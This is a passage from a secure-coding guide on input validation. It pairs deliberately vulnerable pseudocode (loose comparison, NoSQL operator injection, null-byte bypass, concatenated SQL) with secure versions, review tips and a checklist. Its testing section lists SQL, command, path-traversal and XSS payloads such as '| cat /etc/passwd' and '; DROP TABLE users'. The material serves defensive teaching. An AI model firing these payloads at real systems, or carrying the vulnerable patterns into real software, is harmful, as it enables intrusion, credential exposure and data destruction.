// SECURE: Explicit type handling with safe coercion

function parseIntegerSafe(value, min, max):
    // Handle null/undefined
    if value is null or value is undefined:
        return {valid: false, error: "Value is required"}

    // If already integer, validate range
    if typeof(value) == "integer":
        if value < min or value > max:
            return {valid: false, error: "Value out of range: " + min + "-" + max}
        return {valid: true, value: value}

    // If string, parse carefully
    if typeof(value) == "string":
        // Check for valid integer string (no floats, no hex, no scientific)
        if not regex.match("^-?[0-9]+$", value):
            return {valid: false, error: "Invalid integer format"}

        parsed = parseInt(value, 10)  // Always specify radix

        // Check for NaN (parsing failure)
        if isNaN(parsed):
            return {valid: false, error: "Could not parse integer"}

        // Check for overflow
        if parsed < MIN_SAFE_INTEGER or parsed > MAX_SAFE_INTEGER:
            return {valid: false, error: "Integer overflow"}

        // Range check
        if parsed < min or parsed > max:
            return {valid: false, error: "Value out of range: " + min + "-" + max}

        return {valid: true, value: parsed}

    // Reject all other types
    return {valid: false, error: "Expected integer, got " + typeof(value)}

// Usage
function handlePayment(request):
    amountResult = parseIntegerSafe(request.body.amount, 1, 1000000)  // 1 cent to $10,000
    if not amountResult.valid:
        return error("amount: " + amountResult.error)

    quantityResult = parseIntegerSafe(request.body.quantity, 1, 100)
    if not quantityResult.valid:
        return error("quantity: " + quantityResult.error)

    // Safe to use validated integers
    total = amountResult.value * quantityResult.value
    processPayment(total)

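Why this is secure:

Explicit handling of null/undefined
Type checking before any operation
Safe string-to-integer parsing with an explicit radix
Overflow checks against platform limits
Range validation for business constraints
Clear error messages for each failure mode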
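
A Python rendering of the same parser might look as follows. It is a sketch under the assumption that failures are reported by raising ValueError rather than returning a result object; parse_integer_safe is a hypothetical name. Python integers do not overflow, so the platform-limit check is replaced by a cap on the number of digits.

```python
import re

# Optional minus sign and 1 to 18 ASCII digits: no floats, hex, or exponents.
_INT_RE = re.compile(r"-?[0-9]{1,18}")


def parse_integer_safe(value, minimum: int, maximum: int) -> int:
    # bool is a subclass of int in Python; reject it before the int check.
    if isinstance(value, bool):
        raise ValueError("expected integer, got bool")
    if isinstance(value, int):
        parsed = value
    elif isinstance(value, str):
        if _INT_RE.fullmatch(value) is None:
            raise ValueError("invalid integer format")
        parsed = int(value)
    else:
        raise ValueError(f"expected integer, got {type(value).__name__}")

    if not minimum <= parsed <= maximum:
        raise ValueError(f"value out of range: {minimum}-{maximum}")
    return parsed
```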

Good Example 5: Allowlist Validation

// SECURE: Allowlist approach - only accept known-good values

// For enum-like fields, use explicit allowlist
ALLOWED_COUNTRIES = ["US", "CA", "GB", "DE", "FR", "JP", "AU"]
ALLOWED_ROLES = ["user", "moderator", "admin"]
ALLOWED_SORT_FIELDS = ["name", "date", "price", "rating"]
ALLOWED_FILE_EXTENSIONS = [".jpg", ".jpeg", ".png", ".gif", ".pdf"]

function validateCountry(input):
    // Case-insensitive comparison against allowlist
    normalized = input.toUpperCase().trim()
    if normalized in ALLOWED_COUNTRIES:
        return {valid: true, value: normalized}
    return {valid: false, error: "Invalid country code"}

function validateSortField(input):
    // Exact match required
    if input in ALLOWED_SORT_FIELDS:
        return {valid: true, value: input}
    return {valid: false, error: "Invalid sort field"}

function validateFileUpload(filename, content):
    // Extension whitelist
    extension = getExtension(filename).toLowerCase()
    if extension not in ALLOWED_FILE_EXTENSIONS:
        return {valid: false, error: "File type not allowed"}

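    // ALSO validate content type (magic bytes)
    // Compare canonical forms so that ".jpg" and ".jpeg" count as the same format
    detectedType = detectFileType(content)
    if canonicalExtension(detectedType.extension) != canonicalExtension(extension):
        return {valid: false, error: "File content doesn't match extension"}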

    // Additional: check file isn't actually executable or contains script
    if containsExecutableContent(content):
        return {valid: false, error: "File contains disallowed content"}

    return {valid: true}

// For SQL column/table names (cannot be parameterized)
function validateColumnName(input, allowedColumns):
    if input in allowedColumns:
        return input  // Safe to use in query
    throw ValidationError("Invalid column name")

// Usage in query
function searchProducts(filters):
    sortField = validateColumnName(filters.sortBy, ["name", "price", "created_at"])
    sortOrder = filters.order == "desc" ? "DESC" : "ASC"  // Binary choice

    // Now safe to interpolate (they're from allowlist)
    query = "SELECT * FROM products ORDER BY " + sortField + " " + sortOrder
    return database.query(query)

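Why this is secure:

Only pre-approved values are accepted
No regex complexity or bypass potential
Clear, auditable list of allowed values
Easy to update when requirements change
File validation checks both the extension and the content.
SQL identifiers are validated against an explicit list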
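
For the SQL identifier case specifically, a dictionary lookup keeps user input out of the query text altogether, because only values stored in the allowlist are ever interpolated. The sketch below is illustrative; the column names and build_product_query are assumptions.

```python
# Maps public parameter values to the SQL fragments they are allowed to produce.
ALLOWED_SORT_COLUMNS = {"name": "name", "price": "price", "created": "created_at"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_product_query(sort_by, order="asc") -> str:
    try:
        column = ALLOWED_SORT_COLUMNS[sort_by]
        direction = ALLOWED_DIRECTIONS[order.lower()]
    except (KeyError, AttributeError, TypeError):
        # Unknown value, non-string order, or unhashable input: reject uniformly.
        raise ValueError("invalid sort parameters") from None
    # Safe to interpolate: both fragments come from the dictionaries above.
    return f"SELECT * FROM products ORDER BY {column} {direction}"
```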

Good Example 6: Normalization Before Validation

// SECURE: Normalize input before validation to prevent bypass

function validatePath(input):
    // Step 1: Reject null bytes (used to bypass filters)
    if contains(input, "\x00"):
        return {valid: false, error: "Invalid character in path"}

    // Step 2: Decode URL encoding (multiple rounds to catch double-encoding)
    decoded = input
    for i in range(3):  // Max 3 rounds of decoding
        newDecoded = urlDecode(decoded)
        if newDecoded == decoded:
            break  // No more encoding to decode
        decoded = newDecoded

    // Step 3: Normalize path separators
    normalized = decoded.replace("\\", "/")

    // Step 4: Resolve path (remove . and ..)
    resolved = resolvePath(normalized)

    // Step 5: Check against allowed base directory
    allowedBase = "/var/www/uploads/"
    if not resolved.startsWith(allowedBase):
        return {valid: false, error: "Path traversal detected"}

    // Step 6: Check for remaining dangerous patterns
    if contains(resolved, ".."):
        return {valid: false, error: "Invalid path component"}

    return {valid: true, value: resolved}

function validateUsername(input):
    // Normalize Unicode before validation
    // NFC = Canonical Composition (combines characters)
    normalized = unicodeNormalize(input, "NFC")

    // Check for confusable characters (homoglyphs)
    if containsHomoglyphs(normalized):
        return {valid: false, error: "Username contains confusable characters"}

    // Now validate the normalized form
    if not regex.match("^[a-zA-Z0-9_]{3,20}$", normalized):
        return {valid: false, error: "Invalid username format"}

    return {valid: true, value: normalized}

function validateUrl(input):
    // Parse URL to get components
    parsed = parseUrl(input)

    if parsed is null:
        return {valid: false, error: "Invalid URL"}

    // Validate scheme (allowlist)
    if parsed.scheme not in ["http", "https"]:
        return {valid: false, error: "Only HTTP(S) URLs allowed"}

    // Check for IP addresses (may be SSRF target)
    if isIpAddress(parsed.host):
        return {valid: false, error: "IP addresses not allowed"}

    // Check for internal hostnames
    if parsed.host.endsWith(".internal") or parsed.host == "localhost":
        return {valid: false, error: "Internal URLs not allowed"}

    // Check for credentials in URL
    if parsed.username or parsed.password:
        return {valid: false, error: "Credentials in URL not allowed"}

    // Reconstruct URL from parsed components (normalizes encoding)
    canonicalUrl = buildUrl(parsed.scheme, parsed.host, parsed.port, parsed.path)

    return {valid: true, value: canonicalUrl}

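Why this is secure:

Multiple encoding layers are decoded before validation
Path canonicalization prevents traversal via /./ or /../
Unicode normalization combined with a confusables check guards against homoglyph attacks
URL parsing validates the structure before the content is checked.
A URL scheme allowlist blocks schemes such as file:// and javascript:
SSRF protection by rejecting internal hostnames and IP addresses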
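
The path-handling steps can be sketched in Python with the standard library alone. This version works purely on strings (posixpath.normpath does not touch the filesystem), so it does not resolve symlinks; a real deployment would likely need os.path.realpath as well. UPLOAD_ROOT and resolve_upload_path are assumed names.

```python
import posixpath
from urllib.parse import unquote

UPLOAD_ROOT = "/var/www/uploads"


def resolve_upload_path(user_path: str) -> str:
    # Decode repeatedly so double-encoded sequences such as %252e are exposed.
    decoded = user_path
    for _ in range(3):
        next_decoded = unquote(decoded)
        if next_decoded == decoded:
            break
        decoded = next_decoded
    else:
        # Still changing after three rounds: treat as hostile.
        raise ValueError("too many encoding layers")

    # Check for null bytes after decoding so that %00 is caught too.
    if "\x00" in decoded:
        raise ValueError("null byte in path")

    relative = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(UPLOAD_ROOT, relative))

    # After normalization the path must still sit strictly below the root.
    if not candidate.startswith(UPLOAD_ROOT + "/"):
        raise ValueError("path escapes upload directory")
    return candidate
```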

Edge Cases

Edge Case 1: Unicode Normalization Issues

// DANGEROUS: Validating before normalization allows bypass

// Attack: Using decomposed Unicode characters
// "admin" can be represented as:
// - "admin" (5 ASCII characters)
// - "admin" with combining characters: "admin" + accent marks
// - Confusables: "αdmin" (Greek alpha), "аdmin" (Cyrillic a)

function vulnerableUsernameCheck(input):
    if input == "admin":
        return "Cannot register as admin"
    return "OK"

// Attacker uses: "аdmin" (Cyrillic 'а' looks like Latin 'a')
vulnerableUsernameCheck("аdmin")  // Returns "OK"
// But displays as "admin" in UI!

// SECURE: Normalize and check for confusables
function secureUsernameCheck(input):
    // Step 1: Unicode normalize to NFC
    normalized = unicodeNormalize(input, "NFC")

    // Step 2: Convert confusables to ASCII equivalent
    ascii = convertConfusablesToAscii(normalized)

    // Step 3: Check reserved names against ASCII version
    reservedNames = ["admin", "root", "system", "administrator", "support"]
    if ascii.toLowerCase() in reservedNames:
        return {valid: false, error: "Reserved username"}

    // Step 4: Only allow safe character set
    if not isAsciiAlphanumeric(input):
        return {valid: false, error: "Username must be ASCII letters and numbers"}

    return {valid: true, value: normalized}

Detection: Test with Unicode confusables (for names such as admin and root), combining characters, and zero-width characters.
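
A small Python sketch of an ASCII-only username policy is shown below. It uses NFKC rather than the NFC form shown above, a deliberate substitution, because NFKC also folds compatibility characters such as full-width letters into their ASCII equivalents. It does not map confusables; it simply rejects anything that is still non-ASCII after normalization. RESERVED and check_username are assumed names.

```python
import unicodedata

RESERVED = {"admin", "root", "system", "administrator", "support"}


def check_username(raw: str) -> str:
    # NFKC folds compatibility forms (for example full-width letters) to ASCII.
    normalized = unicodedata.normalize("NFKC", raw).casefold()

    # Cyrillic or Greek look-alikes and zero-width characters are not ASCII
    # alphanumerics, so they fail here.
    if not (normalized.isascii() and normalized.isalnum()):
        raise ValueError("username must be ASCII letters and digits")
    if not 3 <= len(normalized) <= 20:
        raise ValueError("username must be 3-20 characters")
    if normalized in RESERVED:
        raise ValueError("reserved username")
    return normalized
```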

Edge Case 2: Null Byte Injection

// DANGEROUS: Null bytes can truncate strings in some languages

// Filename validation bypass with null byte
filename = "malicious.php\x00.jpg"

// In C/PHP, strcmp might only see "malicious.php\x00"
// The ".jpg" is ignored
if filename.endsWith(".jpg"):
    uploadFile(filename)  // Allows .php upload!

// Path validation bypass
path = "/safe/directory/../../etc/passwd\x00/safe/suffix"
// Validation sees: ends with "/safe/suffix" - looks OK
// File system sees: "/etc/passwd"

// SECURE: Strip null bytes first
function sanitizeInput(input):
    // Remove null bytes entirely
    sanitized = input.replace("\x00", "")

    // Also remove other control characters
    sanitized = removeControlCharacters(sanitized)

    return sanitized

function validateFilename(input):
    sanitized = sanitizeInput(input)

    // Now validate
    if sanitized != input:
        return {valid: false, error: "Invalid characters in filename"}

    // Continue with extension validation
    // ...

Detection: Test every string input with embedded null bytes (\x00, %00).

Edge Case 3: Type Confusion

// DANGEROUS: Loose type comparison leads to bypass

// JavaScript/PHP style loose comparison
function vulnerableAuth(password):
    storedHash = "0e123456789"  // Some MD5 hashes start with "0e"
    inputHash = md5(password)

    // In PHP: "0e123456789" == "0e987654321" is TRUE!
    // Both are interpreted as 0 * 10^(number) = 0
    if inputHash == storedHash:  // Loose comparison
        return "Authenticated"
    return "Failed"

// Type confusion with arrays
function vulnerablePasswordReset(token):
    // Expected: token = "abc123def456"
    // Attack: token = {"$gt": ""}  (MongoDB injection via type confusion)

    if database.findOne({"resetToken": token}):
        return "Token found"

// SECURE: Strict type checking
function secureAuth(user, password):
    storedHash = getStoredHash(user)
    inputHash = hashPassword(password)

    // Strict comparison and constant-time
    if typeof(inputHash) != "string" or typeof(storedHash) != "string":
        return "Failed"

    if not constantTimeEquals(inputHash, storedHash):
        return "Failed"

    return "Authenticated"

function securePasswordReset(token):
    // Enforce string type
    if typeof(token) != "string":
        return {valid: false, error: "Invalid token format"}

    // Validate format
    if not regex.match("^[a-f0-9]{64}$", token):
        return {valid: false, error: "Invalid token format"}

    // Now safe to query
    result = database.findOne({"resetToken": token})
    // ...

Detection: Send arrays, objects, numbers, and booleans where a string is expected.
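
In Python, the type and format checks can be combined with a constant-time comparison from the standard hmac module. The sketch assumes the expected token is already known to the caller; is_valid_reset_token is a hypothetical name.

```python
import hmac
import re

# 64 lowercase hex characters, matching the token format used above.
_TOKEN_RE = re.compile(r"[a-f0-9]{64}")


def is_valid_reset_token(candidate, expected: str) -> bool:
    # A dict such as {"$gt": ""} or a list fails the type check immediately.
    if not isinstance(candidate, str):
        return False
    if _TOKEN_RE.fullmatch(candidate) is None:
        return False
    # compare_digest avoids leaking the position of the first mismatch.
    return hmac.compare_digest(candidate, expected)
```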

Edge Case 4: Integer Overflow After Validation

// DANGEROUS: Validation passes but computation overflows

function vulnerablePurchase(quantity, price):
    // Validate ranges
    if quantity < 0 or quantity > 1000000:
        return error("Invalid quantity")
    if price < 0 or price > 1000000:
        return error("Invalid price")

    // Both pass validation, but multiplication overflows!
    // quantity = 999999, price = 999999
    // total = 999998000001 (exceeds 32-bit integer)
    total = quantity * price  // OVERFLOW

    chargeCustomer(total)  // May wrap to negative or small number

// SECURE: Check for overflow in computation
function securePurchase(quantity, price):
    // Validate individual ranges
    if not isValidInteger(quantity, 1, 1000):
        return error("Invalid quantity")
    if not isValidInteger(price, 1, 10000000):  // in cents
        return error("Invalid price")

    // Check multiplication won't overflow
    MAX_SAFE_TOTAL = 2147483647  // 32-bit signed max

    if quantity > MAX_SAFE_TOTAL / price:
        return error("Order total too large")

    total = quantity * price  // Now safe

    // Additional business validation
    if total > MAX_ALLOWED_TRANSACTION:
        return error("Transaction exceeds limit")

    chargeCustomer(total)

// Alternative: Use arbitrary precision arithmetic for money
function securePurchaseWithDecimal(quantity, price):
    quantityDecimal = Decimal(quantity)
    priceDecimal = Decimal(price)

    total = quantityDecimal * priceDecimal  // No overflow

    if total > Decimal(MAX_ALLOWED_TRANSACTION):
        return error("Transaction exceeds limit")

    chargeCustomer(total)

Detection: Test with MAX_INT, MAX_INT-1, boundary values, and combinations whose product overflows.
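
Python integers are arbitrary precision, so the sketch below simulates 32-bit signed wraparound to show what a fixed-width language would compute, then applies the same pre-multiplication check as the secure version above. The function names and limits are assumptions.

```python
INT32_MAX = 2**31 - 1


def to_int32(value: int) -> int:
    """Simulate two's-complement wraparound of a 32-bit signed integer."""
    value &= 0xFFFFFFFF
    return value - 2**32 if value > INT32_MAX else value


def checked_total(quantity: int, price_cents: int) -> int:
    if not 1 <= quantity <= 1000:
        raise ValueError("invalid quantity")
    if not 1 <= price_cents <= 10_000_000:
        raise ValueError("invalid price")
    # Divide instead of multiplying so the check itself cannot overflow.
    if quantity > INT32_MAX // price_cents:
        raise ValueError("order total too large")
    return quantity * price_cents
```

In this model, 999999 * 999999 wraps to a negative 32-bit value, which is the kind of result that turns a charge into a credit.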

Common Mistakes

Common Mistake 1: Validating Formatted Output Instead of Input

// WRONG: Validate after formatting
function displayUserData(userId):
    userData = database.getUser(userId)  // Raw from DB

    // Format for display
    formattedName = formatName(userData.name)
    formattedBio = formatBio(userData.bio)

    // Validating AFTER format - too late!
    if containsHtml(formattedName):  // Already formatted/escaped
        return error("Invalid name")

    return template.render(formattedName, formattedBio)

// CORRECT: Validate at input, encode at output
function saveUserData(request):
    name = request.body.name
    bio = request.body.bio

    // Validate raw input BEFORE storing
    if not isValidName(name):
        return error("Invalid name")

    if containsDangerousPatterns(bio):
        return error("Invalid bio content")

    // Store validated (but not encoded) data
    database.saveUser({"name": name, "bio": bio})

function displayUserData(userId):
    userData = database.getUser(userId)

    // Encode for output context (don't validate again)
    return template.render({
        "name": htmlEncode(userData.name),
        "bio": htmlEncode(userData.bio)
    })

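Why this is wrong:

Validation belongs at the input boundary, not the output boundary.
Formatted or encoded data may pass validation yet still be dangerous.
Encoding should happen at output time and depend on the output context.
Validating after formatting is security theater.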
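
For the HTML output context, Python's standard html.escape is enough to show the "encode at output" half of the rule. The sketch below is minimal and assumes the values were already validated and stored raw; render_profile is a hypothetical name, and other contexts (URLs, JavaScript, SQL) need their own encoders.

```python
import html


def render_profile(name: str, bio: str) -> str:
    # Encode at the point of output, for the HTML body context specifically.
    # html.escape also escapes quotes by default (quote=True).
    return "<h1>{}</h1><p>{}</p>".format(html.escape(name), html.escape(bio))
```

Stored data stays unencoded, so the same record can later be rendered safely into a different context with a different encoder.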

Common Mistake 2: Using String Operations on Binary Data

// WRONG: String operations on binary data
function processUploadedImage(fileContent):
    // Convert binary to string - CORRUPTS DATA
    contentString = fileContent.toString("utf-8")

    // String operations fail on binary
    if contentString.startsWith("\x89PNG"):  // May not work correctly
        processImage(contentString)  // Corrupted!

    // Regex on binary data is meaningless
    if regex.match("<script>", contentString):  // False sense of security
        return error("Invalid image")

// CORRECT: Use binary operations for binary data
function processUploadedImage(fileContent):
    // Keep as binary buffer
    buffer = fileContent  // Raw bytes

    // Check magic bytes using binary comparison
    PNG_MAGIC = bytes([0x89, 0x50, 0x4E, 0x47])  // \x89PNG
    JPEG_MAGIC = bytes([0xFF, 0xD8, 0xFF])

    if buffer.slice(0, 4) == PNG_MAGIC:
        imageType = "png"
    else if buffer.slice(0, 3) == JPEG_MAGIC:
        imageType = "jpeg"
    else:
        return error("Unsupported image format")

    // Use dedicated image library for validation
    try:
        image = imageLibrary.load(buffer)

        // Validate image properties
        if image.width > MAX_WIDTH or image.height > MAX_HEIGHT:
            return error("Image too large")

        // Re-encode image (strips any embedded code)
        cleanBuffer = imageLibrary.encode(image, imageType)
        return {valid: true, content: cleanBuffer}

    catch ImageError:
        return error("Invalid image file")

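Why this is wrong:

Decoding as UTF-8 corrupts binary data that contains invalid sequences.
String operations assume a text encoding that does not apply.
Regex cannot meaningfully match binary patterns
Magic-byte checks should use binary comparison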
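
In Python the distinction is enforced by the bytes type itself. The sketch below checks magic bytes directly on the raw buffer; sniff_image_type is a hypothetical helper, and it only identifies the container format. It does not prove that the rest of the file is a well-formed image.

```python
from typing import Optional

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # full 8-byte PNG signature
JPEG_MAGIC = b"\xff\xd8\xff"


def sniff_image_type(content: bytes) -> Optional[str]:
    if not isinstance(content, (bytes, bytearray)):
        raise TypeError("content must be raw bytes, not text")
    # startswith on bytes compares raw byte values; no decoding is involved.
    if content.startswith(PNG_MAGIC):
        return "png"
    if content.startswith(JPEG_MAGIC):
        return "jpeg"
    return None
```

By contrast, calling .decode("utf-8") on a PNG header raises UnicodeDecodeError, because 0x89 is not a valid leading byte in UTF-8.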

Common Mistake 3: Inconsistent Validation Across Endpoints

// WRONG: Different validation in different places
// API Endpoint 1: Strict validation
function createUserApi(request):
    if not isValidEmail(request.email):
        return error("Invalid email")
    if not isStrongPassword(request.password):
        return error("Weak password")
    createUser(request.email, request.password)

// API Endpoint 2: No validation (developer forgot)
function createUserFromOAuth(oauthData):
    // Trust OAuth provider's email
    createUser(oauthData.email, generateRandomPassword())

// Internal function: Also no validation (assumes callers validated)
function createUserInternal(email, password):
    // Directly insert to database - SQL injection if email not validated upstream
    query = "INSERT INTO users (email, password) VALUES ('" + email + "', ?)"
    database.execute(query, [password])

// CORRECT: Centralized validation
class UserValidator:
    function validateEmail(email):
        if email is null or email is empty:
            throw ValidationError("Email required")
        if length(email) > 254:
            throw ValidationError("Email too long")
        if not regex.match(EMAIL_PATTERN, email):
            throw ValidationError("Invalid email format")
        return email.toLowerCase().trim()

    function validatePassword(password):
        // ... password validation
        return password

    function validateUserData(data):
        return {
            "email": this.validateEmail(data.email),
            "password": this.validatePassword(data.password)
        }

// Single creation function used by all endpoints
function createUser(data):
    validated = UserValidator.validateUserData(data)

    // Now safe to use parameterized query
    query = "INSERT INTO users (email, password) VALUES (?, ?)"
    database.execute(query, [validated.email, hashPassword(validated.password)])

// All endpoints use the same function
function createUserApi(request):
    createUser(request.body)

function createUserFromOAuth(oauthData):
    createUser({"email": oauthData.email, "password": generateRandomPassword()})

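Why this is wrong:

Multiple code paths = multiple places to forget validation
Different validation rules lead to an inconsistent security posture.
Internal functions should not trust that their callers validated correctly.
Centralized validation ensures consistent security

Validation Framework Patterns

Pattern 1: Layered Validation Architecture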

// Layer 1: Transport-level validation (before application code)
// - Request size limits
// - Content-Type checking
// - Rate limiting
// Typically configured in web server/framework

// Layer 2: Schema validation (structure and types)
function validateSchema(data, schema):
    return schemaValidator.validate(data, schema)

// Layer 3: Format validation (syntax)
function validateFormats(data):
    errors = []
    if data.email and not isValidEmailFormat(data.email):
        errors.append("Invalid email format")
    if data.url and not isValidUrl(data.url):
        errors.append("Invalid URL format")
    return errors

// Layer 4: Business rule validation (semantics)
function validateBusinessRules(data, context):
    errors = []
    if data.endDate < data.startDate:
        errors.append("End date must be after start date")
    if data.quantity > context.inventory.available:
        errors.append("Insufficient inventory")
    return errors

// Orchestration
function validateRequest(request, schema, context):
    // Layer 2: Schema
    schemaResult = validateSchema(request.body, schema)
    if not schemaResult.valid:
        return {valid: false, errors: schemaResult.errors, layer: "schema"}

    // Layer 3: Format
    formatErrors = validateFormats(request.body)
    if formatErrors.length > 0:
        return {valid: false, errors: formatErrors, layer: "format"}

    // Layer 4: Business rules
    businessErrors = validateBusinessRules(request.body, context)
    if businessErrors.length > 0:
        return {valid: false, errors: businessErrors, layer: "business"}

    return {valid: true, data: request.body}

Pattern 2: Validation Pipeline with Short-Circuiting

// Define validators as composable functions
validators = [
    (data) => checkRequired(data, ["email", "password"]),
    (data) => checkTypes(data, {email: "string", password: "string"}),
    (data) => checkLength(data.email, 1, 254),
    (data) => checkLength(data.password, 12, 128),
    (data) => checkFormat(data.email, EMAIL_PATTERN),
    (data) => checkPasswordStrength(data.password),
    (data) => checkEmailNotRegistered(data.email)  // Async/DB check
]

function validatePipeline(data, validators):
    for validator in validators:
        result = validator(data)
        if not result.valid:
            return result  // Short-circuit on first failure
    return {valid: true, data: data}

// Usage
result = validatePipeline(requestData, validators)
if not result.valid:
    return error(result.message)
processValidatedData(result.data)

Pattern 3: Declarative Field Validation

// Define validation rules per field
FIELD_RULES = {
    "email": {
        required: true,
        type: "string",
        maxLength: 254,
        format: "email",
        transform: (v) => v.toLowerCase().trim()
    },
    "age": {
        required: true,
        type: "integer",
        min: 0,
        max: 150
    },
    "role": {
        required: true,
        type: "string",
        enum: ["user", "admin", "moderator"]
    },
    "tags": {
        required: false,
        type: "array",
        items: {
            type: "string",
            maxLength: 50,
            pattern: "^[a-z0-9-]+$"
        },
        maxItems: 10
    }
}

function validateFields(data, rules):
    result = {}
    errors = []

    for fieldName, fieldRules in rules:
        value = data[fieldName]

        // Required check
        if fieldRules.required and (value is null or value is undefined):
            errors.append({field: fieldName, message: "Required"})
            continue

        // Skip optional empty fields
        if value is null or value is undefined:
            continue

        // Type check
        if typeof(value) != fieldRules.type:
            errors.append({field: fieldName, message: "Invalid type"})
            continue

        // Apply transform if exists
        if fieldRules.transform:
            value = fieldRules.transform(value)

        // Range/length checks based on type
        error = validateFieldConstraints(value, fieldRules)
        if error:
            errors.append({field: fieldName, message: error})
            continue

        result[fieldName] = value

    if errors.length > 0:
        return {valid: false, errors: errors}
    return {valid: true, data: result}

Detection Tips: How to Spot Missing Validation

Code Review Patterns

// 1. Request body used directly without validation
request.body.xxx      // Search for: request\.body\.\w+
req.params.xxx        // Search for: req\.params\.\w+
request.query.xxx     // Search for: request\.query\.\w+

// 2. Missing null checks before property access
user.profile.address  // Search for: \w+\.\w+\.\w+ (chained access without ?.)
data.items[0]         // Search for: \w+\[\d+\] (hardcoded array index)

// 3. Type coercion without validation
parseInt(xxx)         // Search for: parseInt\([^,]+\) (no radix)
Number(xxx)           // Search for: Number\(\w+
parseFloat(xxx)       // Without subsequent isNaN check

// 4. Regex without anchors
/pattern/             // Search for: /[^/^][^$]+[^$/]/ (no ^ or $)
new RegExp("xxx")     // Search for: new RegExp\("[^^]

// 5. Client-side validation only
if (form.valid)       // Look for validation in frontend, missing in backend
validate()            // In JS files, search corresponding backend endpoint

// 6. Array access from user input
array[userInput]      // Search for: \[\w+\.\w+\] (property access with user data)
object[key]           // Where key comes from request

// GREP patterns for security review:
// request\.(body|params|query)\.\w+
// parseInt\([^,)]+\)(?!\s*,\s*10)
// \.\w+\.\w+\.\w+(?!\?)
// /[^/]+/(?!.*[^\\]\$)
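As a rough illustration of how two of the search patterns above could be automated, the following Python sketch scans source text line by line. The rule names and the `scan_source` helper are hypothetical, and a match is only a prompt for manual review, not proof of a vulnerability.

```python
import re

# Two of the review patterns listed above; the rule names are made up for this sketch.
REVIEW_PATTERNS = {
    "unvalidated-request-access": re.compile(r"request\.(body|params|query)\.\w+"),
    "parseInt-without-radix": re.compile(r"parseInt\([^,)]+\)"),
}


def scan_source(text):
    """Return (line number, rule name, stripped line) for every pattern hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in REVIEW_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings
```

For example, `scan_source("const id = parseInt(request.query.id)")` reports both rules for line 1, while `parseInt(raw, 10)` is not flagged because the radix is present.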

Testing Patterns

// Automated validation testing checklist:

// 1. Boundary testing
- Test with null, undefined, empty string for all fields
- Test with max length + 1 characters
- Test with min - 1 and max + 1 for numeric ranges
- Test with integer overflow values (2^31, 2^32, 2^64)

// 2. Type confusion testing
- Send array where string expected: {"email": ["test@test.com"]}
- Send object where string expected: {"email": {"$gt": ""}}
- Send number where string expected: {"email": 12345}
- Send boolean where string expected: {"email": true}

// 3. Encoding bypass testing
- URL encoding: %00, %2e%2e%2f
- Unicode encoding: \u0000, \u002e
- Double encoding: %2500
- Mixed case: %2E%2e%2F

// 4. Injection payload testing
- SQL: ' OR '1'='1, '; DROP TABLE users; --
- Command: ; ls, | cat /etc/passwd, `whoami`
- Path: ../../../etc/passwd, ....//....//
- XSS: <script>alert(1)</script>, javascript:alert(1)

// 5. ReDoS testing
- For each regex, test with pattern: (valid_char * 30) + invalid_char
- Measure response time - should be < 100ms
- Exponential time indicates ReDoS vulnerability
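The ReDoS check in item 5 could be scripted roughly as follows. This is a sketch under stated assumptions: `probe_regex` and `looks_vulnerable` are hypothetical helpers, the 0.1 second budget mirrors the 100 ms figure above, and the input grows in small steps so that a vulnerable pattern is abandoned shortly after it crosses the budget instead of being run at full length.

```python
import re
import time


def probe_regex(pattern, valid_char="a", invalid_char="!",
                sizes=range(10, 31, 2), budget_seconds=0.1):
    """Time the pattern against (valid_char * n) + invalid_char for growing n."""
    compiled = re.compile(pattern)
    timings = []
    for size in sizes:
        probe = valid_char * size + invalid_char
        start = time.perf_counter()
        compiled.match(probe)
        elapsed = time.perf_counter() - start
        timings.append((size, elapsed))
        if elapsed > budget_seconds:
            break  # stop early: larger inputs would only take longer
    return timings


def looks_vulnerable(pattern, budget_seconds=0.1):
    """True if any probe exceeded the time budget before reaching 30 characters."""
    timings = probe_regex(pattern, budget_seconds=budget_seconds)
    return timings[-1][1] > budget_seconds
```

A nested quantifier such as `^(a+)+$` is expected to blow past the budget well before 30 characters, whereas `^a+$` should stay far below it. Wall-clock measurements are noisy, so treat a positive result as a reason to inspect the pattern rather than as a verdict.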

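Security Checklist

All user input is validated on the server side (never trust client-side validation alone)
Schema validation enforces the expected structure (additionalProperties: false)
All required fields are checked for null, undefined, and empty values
String lengths are validated against reasonable maximums (prevents denial of service)
Numeric values are validated for type, range, and potential overflow
Arrays are validated against maximum length and item-count limits
Enum fields are validated against an explicit allowlist
All regex patterns are anchored with ^ and $
Regex patterns are tested for ReDoS vulnerabilities
Length is checked before regex matching (ReDoS protection)
Regex operations have timeout protection (defense in depth)
Unicode input is normalized (NFC/NFKC) before validation
Null bytes (\x00, %00) are rejected in string inputs
Path inputs are canonicalized and validated against allowed directories
URL inputs are parsed and validated (scheme, host, no credentials)
File uploads are validated by extension and content type
Integer operations are checked for overflow before computation
Type coercion is explicit, with proper error handling
Validation is consistent across all endpoints (centralized validators)
Error messages are helpful but do not leak details of the validation logic
Validation rules are documented and version-controlled
Validation is tested with fuzzing and boundary values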
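Several of these items (null-byte rejection, Unicode normalization, a length check before the regex, and an anchored match) can be combined in one small routine. The sketch below assumes a hypothetical username field with a 32-character limit and a lowercase ASCII alphabet; the field, the limits, and the function name are illustrative choices, not requirements from this guide.

```python
import re
import unicodedata

USERNAME_RE = re.compile(r"[a-z0-9_-]+")  # used with fullmatch, so effectively anchored
MAX_USERNAME_LEN = 32  # assumed limit for this example


def clean_username(raw):
    """Normalize and validate a username, raising ValueError on bad input."""
    if not isinstance(raw, str):
        raise ValueError("username must be a string")
    if "\x00" in raw:
        raise ValueError("null byte in input")
    # Normalize first so look-alike forms are compared in one canonical shape.
    value = unicodedata.normalize("NFKC", raw).strip().lower()
    # Check length before running the regex to bound the matching work.
    if not 1 <= len(value) <= MAX_USERNAME_LEN:
        raise ValueError("username length out of range")
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("username contains disallowed characters")
    return value
```

The order matters: normalization runs before the allowlist check, so a full-width letter is folded to its ASCII form and then validated, rather than slipping past a check performed on the raw input.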

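Executive Summary

The 6 Critical Security Anti-Patterns

This document provides comprehensive coverage of the six most critical and most common security vulnerabilities in AI-generated code. Together, these patterns are the root cause of the vast majority of security incidents in AI-assisted development.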

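Pattern Overview

#	Pattern	Risk Level	AI Frequency	Primary Threat
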